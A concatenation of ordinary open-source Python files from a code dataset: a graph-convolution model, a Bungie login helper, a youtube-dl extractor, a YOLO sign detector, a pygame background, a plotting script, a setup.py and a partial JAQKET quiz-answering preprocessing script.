nn.Parameter(torch.FloatTensor(dim_in, dim_out))\n self.b = nn.Parameter(torch.FloatTensor(dim_out, ))\n\n def forward(self, X):\n '''\n 计算k个不同范围邻居的GCN\n :param X: (batch_size,N, dim_in)\n :return: (K,batch_size,N, dim_out)\n '''\n Xs = []\n for k in range(self.K):\n X = self.GCN_khops_node[k](X)\n X = self.linear(X)\n X1 = torch.sigmoid(X.matmul(self.W) + self.b)\n\n Xs.append(X1)\n Xs = torch.stack(Xs) # (K,b,V,dim_out)\n return Xs\n\n\nclass MRA_GCN(nn.Module):\n '''\n 计算不同范围邻居的GCN输出的权重\n '''\n\n def __init__(self, L_tilde, dim_in, dim_out, range_K, device,\n in_drop=0.0, gcn_drop=0.0, residual=False):\n super(MRA_GCN, self).__init__()\n self.DEVICE = device\n self.dim_out = dim_out\n self.W_a = nn.Parameter(torch.FloatTensor(self.dim_out, self.dim_out))\n self.U = nn.Parameter(torch.FloatTensor(self.dim_out))\n self.MGCN = MGCN(L_tilde, dim_in, dim_out, range_K, device, in_drop=in_drop, gcn_drop=gcn_drop,\n residual=residual)\n\n def forward(self, X):\n '''\n X:(B,N,dim_in_node)\n return: h(B,N,dim_out)\n '''\n input = self.MGCN(X) # (K,B,N,dim_out)\n e = torch.einsum('ijkm,m->ijk', torch.einsum('ijkl,lm->ijkm', input, self.W_a),\n self.U) # (K,B,N)\n e = e.permute(1, 2, 0) # (K,B,N)->(B,N,K)\n alpha = F.softmax(e, dim=-1).unsqueeze(-1)\n h = torch.einsum('ijkl,ijlm->ijkm', input.permute(1, 2, 3, 0), alpha).squeeze(-1)\n return h\n\n\nclass MRA_GCN_multitasks(nn.Module):\n '''\n 多任务\n '''\n\n def __init__(self, L_tilde_node, dim_in_node, dim_out_node, L_tilde_edge, dim_in_edge, dim_out_edge, range_K,\n device,\n in_drop=0.0, gcn_drop=0.0, residual=False, share_weight=True):\n super(MRA_GCN_multitasks, self).__init__()\n self.DEVICE = device\n self.share_weight = share_weight\n self.task_node = MRA_GCN(L_tilde_node, dim_in_node, dim_out_node, range_K, device, in_drop=in_drop,\n gcn_drop=gcn_drop, residual=residual)\n self.task_edge = MRA_GCN(L_tilde_edge, dim_in_edge, dim_out_edge, range_K, device, in_drop=in_drop,\n gcn_drop=gcn_drop, residual=residual)\n\n if share_weight:\n self.linear0 = nn.Linear(dim_out_node, dim_out_edge)\n self.linear1 = nn.Linear(dim_out_edge, dim_out_node)\n self.W = nn.Parameter(torch.FloatTensor(dim_out_edge, dim_out_edge)) # 共享参数\n self.b = nn.Parameter(torch.FloatTensor(dim_out_edge, ))\n\n def forward(self, X_node, X_edge):\n '''\n\n :param X_node: (B,N,dim_in_node)\n :param X_edge: (B,N,dim_in_edge)\n :return:(B,N,dim_out_node),(B,N,dim_out_edge)\n '''\n res_node = self.task_node(X_node)\n res_edge = self.task_edge(X_edge)\n if self.share_weight:\n res_node = self.linear0(res_node).matmul(self.W) + self.b\n res_node = self.linear1(res_node)\n res_edge = res_edge.matmul(self.W) + self.b\n res_node = torch.sigmoid(res_node)\n res_edge = torch.sigmoid(res_edge)\n return res_node, res_edge\n\n\nclass Sub_MAGCN(nn.Module):\n def __init__(self, L_tilde_node, dim_in_node, dim_out_node, adj_sub_edge, L_tilde_edge, dim_in_edge, dim_out_edge,\n range_K, types_accident=None,\n device=None, in_drop=0.0, gcn_drop=0.0, residual=False, share_weight=True):\n super(Sub_MAGCN, self).__init__()\n self.types_accident = types_accident\n self.subgraph = sub_graph_parallel(adj_sub_edge, dim_in_edge, dim_in_edge, device)\n self.MRAGCN = MRA_GCN_multitasks(L_tilde_node, dim_in_node, dim_out_node, L_tilde_edge, dim_in_edge,\n dim_out_edge,\n range_K, device, in_drop=in_drop, gcn_drop=gcn_drop, residual=residual,\n share_weight=share_weight)\n if types_accident is not None:\n self.W_subgraphs = nn.Parameter(torch.FloatTensor(types_accident, dim_in_edge, dim_in_edge))\n self.linear = nn.Linear(dim_in_edge * 2, dim_in_edge)\n\n def forward(self, X_node, X_edge, X_sub_edge, accident=None):\n '''\n\n :param X_node: (B,N,dim_in_node)\n :param X_edge: (B,N,dim_in_edge)\n :param X_sub_edge:(B,N,N_sub,dim_in_edge)\n :param types_accident: (B,N,1)\n :return: (B,N,dim_out_node),(B,N,dim_out_edge)\n '''\n if self.types_accident is not None:\n # start0 = time.time()\n res_sub = self.subgraph(X_sub_edge, accident, self.W_subgraphs)\n X_edge_cat = torch.cat((X_edge, res_sub), dim=-1)\n X_edge = self.linear(X_edge_cat)\n # print('sub=', time.time() - start0)\n # start1 = time.time()\n res_node, res_edge = self.MRAGCN(X_node, X_edge)\n # print('margcn=', time.time() - start1)\n return res_node, res_edge\n\n\nclass Sub_pred(nn.Module):\n def __init__(self, L_tilde_node, dim_in_node, dim_out_node, adj_sub_edge, L_tilde_edge, dim_in_edge, dim_out_edge,\n range_K, types_accident=None,\n device=None, in_drop=0.0, gcn_drop=0.0, residual=False, share_weight=True):\n super(Sub_pred, self).__init__()\n self.types_accident = types_accident\n self.subgraph = sub_graph_parallel(adj_sub_edge, dim_in_edge, dim_in_edge, device)\n self.linear_node = nn.Linear(dim_in_node, dim_out_node)\n self.linear_edge = nn.Linear(dim_in_edge, dim_out_edge)\n if types_accident is not None:\n self.W_subgraphs = nn.Parameter(torch.FloatTensor(types_accident, dim_in_edge, dim_in_edge))\n self.linear = nn.Linear(dim_in_edge * 2, dim_in_edge)\n\n def forward(self, X_node, X_edge, X_sub_edge, accident=None):\n '''\n\n :param X_node: (B,N,dim_in_node)\n :param X_edge: (B,N,dim_in_edge)\n :param X_sub_edge:(B,N,N_sub,dim_in_edge)\n :param types_accident: (B,N,1)\n :return: (B,N,dim_out_node),(B,N,dim_out_edge)\n '''\n if self.types_accident is not None:\n # start0 = time.time()\n res_sub = self.subgraph(X_sub_edge, accident, self.W_subgraphs)\n X_edge_cat = torch.cat((X_edge, res_sub), dim=-1)\n X_edge = self.linear(X_edge_cat)\n # print('sub=', time.time() - start0)\n # start1 = time.time()\n res_node = self.linear_node(X_node)\n res_edge = self.linear_edge(X_edge)\n # print('margcn=', time.time() - start1)\n return res_node, res_edge\n","repo_name":"wumingyao/MADGCN","sub_path":"model/Sub_MAGCN.py","file_name":"Sub_MAGCN.py","file_ext":"py","file_size_in_byte":7818,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"95"} +{"seq_id":"41814236875","text":"import cookielib\nimport urllib\nimport urllib2\n\n\ntry:\n API_KEY = open('bungie.key').read().strip()\nexcept:\n logging.exception('Unable to read API Key from \"bungie.key\" (see '\n 'https://www.bungie.net/en/Clan/Post/39966/85087279/0/0):')\n API_KEY = ''\n\n\ndef Auth(username, password):\n bungie_url = 'https://www.bungie.net/en/User/SignIn/Psnid'\n psn_url = 'https://auth.api.sonyentertainmentnetwork.com/login.do'\n\n jar = cookielib.CookieJar()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))\n\n req = urllib2.Request(bungie_url)\n conn = opener.open(req)\n _ = conn.read()\n\n req = urllib2.Request(\n psn_url, data=urllib.urlencode({'j_username': username, 'j_password': password}))\n conn = opener.open(req)\n _ = conn.read()\n\n return (jar._cookies['www.bungie.net']['/']['bungled'].value,\n jar._cookies['www.bungie.net']['/']['bungleatk'].value)\n\n\ndef BuildOpener(bungled, bungleatk):\n opener = urllib2.build_opener()\n jar = cookielib.CookieJar()\n jar.set_cookie(BungieCookie('bungled', bungled))\n jar.set_cookie(BungieCookie('bungleatk', bungleatk))\n opener.add_handler(urllib2.HTTPCookieProcessor(jar))\n opener.extra_headers = {'x-api-key': API_KEY, 'x-csrf': bungled}\n opener.add_handler(HeaderAdder(opener.extra_headers))\n return opener\n\n\ndef BungieCookie(name, value):\n return cookielib.Cookie(\n version=0, name=name, value=value, port=None, port_specified=False, domain='www.bungie.net',\n domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=True,\n expires=None, discard=False, comment=None, comment_url=None, rest={'HttpOnly': None},\n rfc2109=False)\n\n\nclass HeaderAdder(urllib2.BaseHandler):\n def __init__(self, headers):\n self.headers = headers\n\n def https_request(self, req):\n for k, v in self.headers.iteritems():\n req.add_header(k, v)\n return req\n","repo_name":"nmlorg/destiny","sub_path":"base/bungie/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8689670971","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nimport json\nimport re\n\nfrom .common import InfoExtractor\nfrom ..compat import compat_HTTPError\nfrom ..utils import (\n ExtractorError,\n int_or_none,\n str_or_none,\n try_get,\n)\n\n\nclass ImgGamingBaseIE(InfoExtractor):\n _API_BASE = 'https://dce-frontoffice.imggaming.com/api/v2/'\n _API_KEY = '857a1e5d-e35e-4fdf-805b-a87b6f8364bf'\n _HEADERS = None\n _MANIFEST_HEADERS = {'Accept-Encoding': 'identity'}\n _REALM = None\n _VALID_URL_TEMPL = r'https?://(?P<domain>%s)/(?P<type>live|playlist|video)/(?P<id>\\d+)(?:\\?.*?\\bplaylistId=(?P<playlist_id>\\d+))?'\n\n def _real_initialize(self):\n self._HEADERS = {\n 'Realm': 'dce.' + self._REALM,\n 'x-api-key': self._API_KEY,\n }\n\n email, password = self._get_login_info()\n if email is None:\n self.raise_login_required()\n\n p_headers = self._HEADERS.copy()\n p_headers['Content-Type'] = 'application/json'\n self._HEADERS['Authorization'] = 'Bearer ' + self._download_json(\n self._API_BASE + 'login',\n None, 'Logging in', data=json.dumps({\n 'id': email,\n 'secret': password,\n }).encode(), headers=p_headers)['authorisationToken']\n\n def _call_api(self, path, media_id):\n return self._download_json(\n self._API_BASE + path + media_id, media_id, headers=self._HEADERS)\n\n def _extract_dve_api_url(self, media_id, media_type):\n stream_path = 'stream'\n if media_type == 'video':\n stream_path += '/vod/'\n else:\n stream_path += '?eventId='\n try:\n return self._call_api(\n stream_path, media_id)['playerUrlCallback']\n except ExtractorError as e:\n if isinstance(e.cause, compat_HTTPError) and e.cause.code == 403:\n raise ExtractorError(\n self._parse_json(e.cause.read().decode(), media_id)['messages'][0],\n expected=True)\n raise\n\n def _real_extract(self, url):\n domain, media_type, media_id, playlist_id = re.match(self._VALID_URL, url).groups()\n\n if playlist_id:\n if self._downloader.params.get('noplaylist'):\n self.to_screen('Downloading just video %s because of --no-playlist' % media_id)\n else:\n self.to_screen('Downloading playlist %s - add --no-playlist to just download video' % playlist_id)\n media_type, media_id = 'playlist', playlist_id\n\n if media_type == 'playlist':\n playlist = self._call_api('vod/playlist/', media_id)\n entries = []\n for video in try_get(playlist, lambda x: x['videos']['vods']) or []:\n video_id = str_or_none(video.get('id'))\n if not video_id:\n continue\n entries.append(self.url_result(\n 'https://%s/video/%s' % (domain, video_id),\n self.ie_key(), video_id))\n return self.playlist_result(\n entries, media_id, playlist.get('title'),\n playlist.get('description'))\n\n dve_api_url = self._extract_dve_api_url(media_id, media_type)\n video_data = self._download_json(dve_api_url, media_id)\n is_live = media_type == 'live'\n if is_live:\n title = self._live_title(self._call_api('event/', media_id)['title'])\n else:\n title = video_data['name']\n\n formats = []\n for proto in ('hls', 'dash'):\n media_url = video_data.get(proto + 'Url') or try_get(video_data, lambda x: x[proto]['url'])\n if not media_url:\n continue\n if proto == 'hls':\n m3u8_formats = self._extract_m3u8_formats(\n media_url, media_id, 'mp4', 'm3u8' if is_live else 'm3u8_native',\n m3u8_id='hls', fatal=False, headers=self._MANIFEST_HEADERS)\n for f in m3u8_formats:\n f.setdefault('http_headers', {}).update(self._MANIFEST_HEADERS)\n formats.append(f)\n else:\n formats.extend(self._extract_mpd_formats(\n media_url, media_id, mpd_id='dash', fatal=False,\n headers=self._MANIFEST_HEADERS))\n self._sort_formats(formats)\n\n subtitles = {}\n for subtitle in video_data.get('subtitles', []):\n subtitle_url = subtitle.get('url')\n if not subtitle_url:\n continue\n subtitles.setdefault(subtitle.get('lang', 'en_US'), []).append({\n 'url': subtitle_url,\n })\n\n return {\n 'id': media_id,\n 'title': title,\n 'formats': formats,\n 'thumbnail': video_data.get('thumbnailUrl'),\n 'description': video_data.get('description'),\n 'duration': int_or_none(video_data.get('duration')),\n 'tags': video_data.get('tags'),\n 'is_live': is_live,\n 'subtitles': subtitles,\n }\n","repo_name":"ytdl-org/youtube-dl","sub_path":"youtube_dl/extractor/imggaming.py","file_name":"imggaming.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","stars":124682,"dataset":"github-code","pt":"95"} +{"seq_id":"26719180824","text":"from abc import ABC, abstractmethod\nimport os\nimport cv2\nfrom typing import List\nfrom dataclasses import dataclass, asdict\nimport logging\nimport numpy as np\nfrom .contour import Contour\nfrom ultralytics import YOLO\nfrom cap_from_youtube import cap_from_youtube\n\n\n\n@dataclass\nclass DetectorPrediction:\n predicted_contour: Contour\n contour_probability: float\n contour_class: int\n\n dict = asdict\n names = {\n 0: 'blue_border',\n 1: 'blue_rect',\n 2: 'danger',\n 3: 'main_road',\n 4: 'mandatory',\n 5: 'prohibitory'\n }\n\n colores = {\n 0: (255, 0, 0),\n 1: (255, 122, 0),\n 2: (0, 255, 0),\n 3: (0, 255, 122),\n 4: (0, 0, 255),\n 5: (122, 0, 255)\n }\n\n def dict(self):\n return {\n \"contour\": self.predicted_contour.xyxy,\n \"probability\": self.contour_probability,\n \"class\": self.names[int(self.contour_class)],\n \"color\": self.colores[int(self.contour_class)],\n }\n\n\nclass Detector(ABC):\n\n @abstractmethod\n def __init__(self):\n pass\n\n @abstractmethod\n def detect_contours(self, image: np.ndarray) -> List[DetectorPrediction]:\n \"\"\"\n Return boxes of all detected contours from image.\n :param image: np.ndarray RGB image\n :return: List[Contour]\n \"\"\"\n pass\n\n\nclass DummyDetector(Detector):\n\n def __init__(self, detection_model_path: str):\n logging.info('Loading Detector')\n self.model_path = detection_model_path\n\n def detect_contours(self, image: np.ndarray) -> List[DetectorPrediction]:\n dummy_contour = Contour(bounding_rect=(0, 0, 50, 50))\n prediction = DetectorPrediction(predicted_contour=dummy_contour, contour_probability=0.98)\n return [prediction]\n\n\nclass YoloDetector(DummyDetector):\n\n def __init__(self, detection_model_path: str):\n super().__init__(detection_model_path)\n self._load_model()\n\n def _load_model(self):\n self.model = YOLO(self.model_path)\n\n def detect_contours(self, img) -> [DetectorPrediction]:\n predictions = []\n results = self.model(img)\n for result in results[0].boxes.data:\n\n contour = Contour(bounding_rect=(result[0], result[1], result[2], result[3]))\n prediction = DetectorPrediction(contour, float(result[4]), int(result[-1]))\n predictions.append(prediction)\n\n return predictions\n\n def detect_contours_video(self, vid_url: str, save=True):\n video_id = vid_url.split(\"/\")[-2] + \"_\" + vid_url.split(\"/\")[-1]\n frames_dir = f\"media/frames/{video_id}\"\n video_dir = \"media/videos/\"\n os.makedirs(frames_dir,exist_ok=True)\n cap = cap_from_youtube(vid_url, resolution='720p')\n start_time = 5\n cap.set(cv2.CAP_PROP_POS_FRAMES, start_time * cap.get(cv2.CAP_PROP_FPS))\n count = 0\n height, width = 0, 0\n res = []\n while cap.isOpened():\n ret, frame = cap.read()\n if not ret:\n break\n height, width, layers = frame.shape\n preds = self.detect_contours(frame)\n if preds != []:\n res.append(preds)\n for pred in preds:\n data = pred.dict()\n cv2.rectangle(frame, (int(pred.predicted_contour.x_min), int(pred.predicted_contour.y_min)),\n (int(pred.predicted_contour.x_max), int(pred.predicted_contour.y_max)), data[\"color\"], 2)\n\n cv2.imwrite(f\"{frames_dir}/{count}.jpg\", frame)\n count += 1\n\n if save:\n video = cv2.VideoWriter(video_id+\".avi\", 0, 1, (width, height))\n images = [img for img in os.listdir(frames_dir) if img.endswith(\".jpg\")]\n for image in images:\n video.write(cv2.imread(os.path.join(frames_dir, image)))\n\n cv2.destroyAllWindows()\n video.release()\n\n return res, video_dir + video_id\n\n def save_predictions(self, img_path: str, path: str):\n predictions = self.model(img_path)\n return predictions.save(filepath=path)\n","repo_name":"MulhamShaheen/DL-team-6","sub_path":"inference_api/infrustructure/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72924601594","text":"import math\nimport pygame\nimport random\nimport events\nfrom random import randrange\nfrom utils import background\n\n#Edicion: 1\n#Por: Ariel\n\n#Sera el fondo de la presentacion y probablemente tambien del menu\n\nclass Point:\n x,y = 0,0\n angle = 0\n speed = 5\n LOOPS = 0\n STOPPER = 40\n def __init__(self,position,angle,speed):\n self.x,self.y = position\n self.angle = angle\n self.speed = speed\n \n def logic_update(self,EVENTS):\n if (self.LOOPS == 0):\n self.x += math.sin(math.radians(self.angle)) * self.speed\n self.y += math.cos(math.radians(self.angle)) * self.speed\n \n self.x += math.sin(math.radians(self.angle)) * self.speed\n self.y += math.cos(math.radians(self.angle)) * self.speed\n \n if (self.LOOPS % self.STOPPER == 0 and self.speed > 1):\n self.speed += 1\n if (self.STOPPER > 1):\n self.STOPPER = self.STOPPER / 2\n \n self.LOOPS += 1\n \n \n def graphic_update(self,SCREEN):\n pygame.draw.circle(SCREEN,(255,255,255),(int(self.x),int(self.y)),1)\nclass Background:\n POINTS = []\n LOOPS = 0\n PERIOD = 1\n __COLOR= background.cBackground()\n def __init__(self):\n \n self.__COLOR.set_min_blue(100)\n self.__COLOR.set_min_red(100)\n self.__COLOR.set_min_green(100)\n self.__COLOR.SetSpeed(3)\n \n def logic_update(self,EVENTS):\n self.__COLOR.update()\n \n for x in range(len(self.POINTS)):\n self.POINTS[x].logic_update(EVENTS)\n if (self.LOOPS % self.PERIOD == 0):\n for y in range(2):\n self.AddPoint()\n self.LOOPS += 1\n \n def graphic_update(self,SCREEN):\n SCREEN.fill(self.__COLOR.GetColor())\n \n for x in range(len(self.POINTS)):\n self.POINTS[x].graphic_update(SCREEN)\n \n def AddPoint(self):\n STAGE_WIDTH,STAGE_HEIGHT = pygame.display.get_surface().get_size()\n point = Point((STAGE_WIDTH / 2, STAGE_HEIGHT / 2), random.randrange(360), 5)\n point.logic_update(events.events())\n self.POINTS.append(point)","repo_name":"elgrandt/TuxWorld-3","sub_path":"presentation/background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"74258896951","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.rc('text', usetex=True)\nplt.rcParams['font.family']= 'cm'\nplt.rc('text.latex', preamble=r'\\usepackage{amsmath}')\n\nx = y = np.linspace(-1, 1, 20)\nr = np.hypot(x,y)\nX, Y = np.meshgrid(x, y)\n\nu = X/r**3\nv = Y/r**3\n\nfig = plt.figure(figsize=(8,8))\nplt.subplot(111)\nplt.quiver(X, Y, u, v, color='b')\nplt.title(r\"$\\vec{\\bf{v}} = \\dfrac{ \\vec{ \\bf{r} } }{r^2}$ \", y = 1.02, fontsize=15)\n\nplt.tight_layout()\nplt.savefig('Fig3c', dpi=300)\nplt.show()","repo_name":"Shiro951216/Mathematical_Models_of_Physics","sub_path":"Homework1/codes/Graphics/Vector Fields/3c.py","file_name":"3c.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15926720595","text":"#!/usr/bin/env python3\n#-*- coding:utf-8 -*-\n\nimport os\nimport re\n\ntry:\n from setuptools import setup\n has_setuptools = True\nexcept ImportError:\n from distutils.core import setup\n has_setuptools = False\n\nPROJECT_NAME = 'py2xml'\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\n### FIND ALL SUB-PACKAGES ###\ndef iter_packages(root):\n ignore = len(os.path.dirname(root)) + 1\n for path, _, files in os.walk(root):\n if '__init__.py' in files:\n yield '.'.join(path[ignore:].split(os.path.sep))\nPACKAGES = list(iter_packages(os.path.join(ROOT_DIR, PROJECT_NAME)))\n\n\n### METADATA ###\ntry:\n with open(os.path.join(ROOT_DIR, PROJECT_NAME, '__init__.py')) as f:\n VERSION = re.search(\"__version__ = '([^']+)'\", f.read()).group(1)\nexcept IOError:\n with open(os.path.join(ROOT_DIR, PROJECT_NAME + '.py')) as f:\n VERSION = re.search(\"__version__ = '([^']+)'\", f.read()).group(1)\n\nwith open(os.path.join(ROOT_DIR, 'README.md')) as f:\n README = f.read()\n\nwith open(os.path.join(ROOT_DIR, 'LICENSE')) as f:\n LICENSE = f.read()\n\nmetadata = {\n 'name': PROJECT_NAME,\n 'version': VERSION,\n 'description': \"Magic declarative XML building tool.\",\n 'long_description': README,\n 'author': 'Philipp Rasch',\n 'author_email': 'ph.r@hotmail.de',\n #'url': '',\n #'download_url': '',\n 'platforms': 'any',\n 'license': LICENSE,\n 'packages': PACKAGES,\n 'classifiers': ('Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.5'\n )\n}\n\n# setuptools only arguments\nif has_setuptools:\n metadata.update({\n #'tests_require': ['pytest>=2.6.1']\n})\n\n\nif __name__ == '__main__':\n setup(**metadata)\n","repo_name":"DaRasch/py2xml","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15002398804","text":"import json\nimport argparse\nimport glob\nimport logging\nimport os\nimport random\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\n\nimport multiprocessing\nfrom multiprocessing import Pool\n\nfrom typing import List\nfrom io import open\nimport gzip\n\nfrom transformers import (\n WEIGHTS_NAME,\n BertConfig,\n BertForMultipleChoice,\n BertJapaneseTokenizer,\n PreTrainedTokenizer,\n)\n\nimport math\nimport MeCab\nfrom collections import Counter, defaultdict\nimport pickle\nimport time\nimport unidic\n\nimport logging\nlogger = logging.getLogger(__name__)\n\ntagger = MeCab.Tagger('-d \"{}\"'.format(unidic.DICDIR))\nSTOP_POSTAGS = ('BOS/EOS',\"代名詞\",\"接続詞\",\"感動詞\",\"動詞,非自立可能\",\"助動詞\",'助詞',\"接頭辞\",\"記号,一般\",\"補助記号\",\"空白\")\nSEPARATE_TOKEN = '。'\n\n\nclass InputExample(object):\n \"\"\"A single training/test example for multiple choice\"\"\"\n\n def __init__(self, example_id, question, contexts, endings,ctx1,ctx2,ctx3,label=None):\n \"\"\"Constructs a InputExample.\n Args:\n example_id: Unique id for the example.\n contexts: list of str. The untokenized text of the first sequence\n (context of corresponding question).\n question: string. The untokenized text of the second sequence\n (question).\n endings: list of str. multiple choice's options.\n Its length must be equal to contexts' length.\n label: (Optional) string. The label of the example. This should be\n specified for train and dev examples, but not for test examples.\n \"\"\"\n self.example_id = example_id\n self.question = question\n self.contexts = contexts\n self.endings = endings\n self.label = label\n self.ctx1 = ctx1\n self.ctx2 = ctx2\n self.ctx3 = ctx3\n\n\nclass InputFeatures(object):\n def __init__(self, example_id, choices_features1,choices_features2,choices_features3,choices_features4, label):\n self.example_id = example_id\n self.choices_features1 = [\n {\n \"input_ids\": input_ids,\n \"input_mask\": input_mask,\n \"segment_ids\": segment_ids,\n }\n for input_ids, input_mask, segment_ids in choices_features1\n ]\n self.choices_features2 = [\n {\n \"input_ids\": input_ids,\n \"input_mask\": input_mask,\n \"segment_ids\": segment_ids,\n }\n for input_ids, input_mask, segment_ids in choices_features2\n ]\n self.choices_features3 = [\n {\n \"input_ids\": input_ids,\n \"input_mask\": input_mask,\n \"segment_ids\": segment_ids,\n }\n for input_ids, input_mask, segment_ids in choices_features3\n ]\n self.choices_features4 = [\n {\n \"input_ids\": input_ids,\n \"input_mask\": input_mask,\n \"segment_ids\": segment_ids,\n }\n for input_ids, input_mask, segment_ids in choices_features4\n ]\n self.label = label\n\n\nclass DataProcessor(object):\n \"\"\"Base class for data converters for multiple choice data sets.\"\"\"\n\n def get_examples(self, mode, data_dir, fname, entities_fname):\n \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\"\n raise NotImplementedError()\n\n def get_labels(self):\n \"\"\"Gets the list of labels for this data set.\"\"\"\n raise NotImplementedError()\n \n \nclass JaqketProcessor(DataProcessor):\n\n def _get_entities(self, data_dir, entities_fname):\n logger.info(\"LOOKING AT {} entities\".format(data_dir))\n entities = dict()\n for line in self._read_json_gzip(os.path.join(data_dir, entities_fname)):\n entity = json.loads(line.strip())\n entities[entity[\"title\"]] = entity[\"text\"]\n\n return entities\n\n def get_examples(self, mode, data_dir, json_data, entities, num_options=20):\n \"\"\"See base class.\"\"\"\n logger.info(\"LOOKING AT {} [{}]\".format(data_dir, mode))\n entities = entities\n return self._create_examples(\n json_data,\n mode,\n entities,\n num_options,\n )\n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [\n \"0\",\n \"1\",\n \"2\",\n \"3\",\n \"4\",\n \"5\",\n \"6\",\n \"7\",\n \"8\",\n \"9\",\n \"10\",\n \"11\",\n \"12\",\n \"13\",\n \"14\",\n \"15\",\n \"16\",\n \"17\",\n \"18\",\n \"19\",\n ]\n\n def _read_json(self, input_file):\n return input_file\n# with open(input_file, \"r\", encoding=\"utf-8\") as fin:\n# lines = fin.readlines()\n# return lines\n\n def _read_json_gzip(self, input_file):\n with gzip.open(input_file, \"rt\", encoding=\"utf-8\") as fin:\n lines = fin.readlines()\n return lines\n\n def _create_examples(self, lines, t_type, entities, num_options):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n\n examples = []\n skip_examples = 0\n\n # for line in tqdm.tqdm(\n # lines, desc=\"read jaqket data\", ascii=True, ncols=80\n # ):\n logger.info(\"read jaqket data: {}\".format(len(lines)))\n for line in lines:\n data_raw = line\n\n id = data_raw[\"qid\"]\n question = data_raw[\"question\"].replace(\"_\", \"\") # \"_\" は cloze question\n options = data_raw[\"answer_candidates\"][:num_options] # TODO\n answer = data_raw[\"answer_entity\"]\n ctx1 = data_raw[\"ctx1\"]\n ctx2 = data_raw[\"ctx2\"]\n ctx3 = data_raw[\"ctx3\"]\n\n if answer not in options:\n continue\n\n if len(options) != num_options:\n skip_examples += 1\n continue\n\n contexts = [entities[options[i]] for i in range(num_options)]\n truth = str(options.index(answer))\n\n if len(options) == num_options: # TODO\n examples.append(\n InputExample(\n example_id=id,\n question=question,\n contexts=contexts,\n endings=options,\n ctx1=ctx1,\n ctx2=ctx2,\n ctx3=ctx3,\n label=truth,\n )\n )\n\n if t_type == \"train\":\n assert len(examples) > 1\n assert examples[0].label is not None\n\n logger.info(\"len examples: {}\".format(len(examples)))\n logger.info(\"skip examples: {}\".format(skip_examples))\n\n return examples\n \ndef convert_examples_to_features(example):\n# tokenizer: PreTrainedTokenizer,)\n \n \n label_list = [f\"{i}\" for i in range(20)]\n label_map = {label: i for i, label in enumerate(label_list)}\n pad_token_segment_id=0\n pad_on_left=False\n pad_token=0\n mask_padding_with_zero=True\n max_length = 768\n \n contexts,endings,question,label,example_id,ctx_add1,ctx_add2,ctx_add3 = example\n \n ##top1_ignore-answer\n entity_text1 = \"。\".join([entities[doc_id2title[s[0]]] for s in ctx_add1[:1]])\n ##top5_in-answer\n entity_text2 = \"。\".join([entities[doc_id2title[s[0]]] for s in ctx_add2[:5]])\n \n features = []\n context2_1 = get_contexts_bm25(entity_text1,question)\n context2_3 = get_contexts_bm25(entity_text2,question)\n ##正解エンティティの本文 + 正解候補のタイトルを除外したBM25で引っ張ってきた文章(top1)\n choices_features1 = []\n ##選択肢本文のみ\n choices_features2 = []\n ##BM25で引っ張ってきた文章のみ(top5)\n choices_features3 = []\n ##BM25で引っ張ってきた文章のみ(top5)(wikiを検索するときも並び替えの時もqueryに選択肢を追加)\n choices_features4 = []\n for ending_idx, (context, ending) in enumerate(\n zip(contexts,endings)\n ):\n input_ids, attention_mask, token_type_ids = make_bert_input1(ending,question,context2_1,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id)\n choices_features1.append((input_ids, attention_mask, token_type_ids))\n input_ids, attention_mask, token_type_ids = make_bert_input2(ending,question,context2_1,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id)\n choices_features2.append((input_ids, attention_mask, token_type_ids))\n input_ids, attention_mask, token_type_ids = make_bert_input3(ending,question,context2_3,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id)\n choices_features3.append((input_ids, attention_mask, token_type_ids))\n \n \n entity_text = \"。\".join([entities[doc_id2title[s[0]]] for s in ctx_add3[ending_idx][:5]])\n context2_4 = get_contexts_bm25_add_answer(entity_text,question,ending)\n input_ids, attention_mask, token_type_ids = make_bert_input3(ending,question,context2_4,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id)\n choices_features4.append((input_ids, attention_mask, token_type_ids))\n\n\n label = label_map[label]\n\n features.append(\n InputFeatures(\n example_id=example_id,\n choices_features1=choices_features1,\n choices_features2=choices_features2,\n choices_features3=choices_features3,\n choices_features4=choices_features4,\n label=label,\n )\n )\n\n return features\n\ndef make_bert_input1(ending,question,context2,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id):\n context1 = get_contexts_bm25(entities[ending],question)\n text_a = context1[:768]+ tokenizer.sep_token + context2\n text_b = question + tokenizer.sep_token + ending\n\n inputs = tokenizer.encode_plus(\n text_a,\n text_b,\n add_special_tokens=True,\n max_length=max_length,\n truncation=\"only_first\", # 常にcontextをtruncate\n )\n\n input_ids, token_type_ids = (\n inputs[\"input_ids\"],\n inputs[\"token_type_ids\"],\n )\n\n # The mask has 1 for real tokens and 0 for padding tokens. Only\n # real tokens are attended to.\n 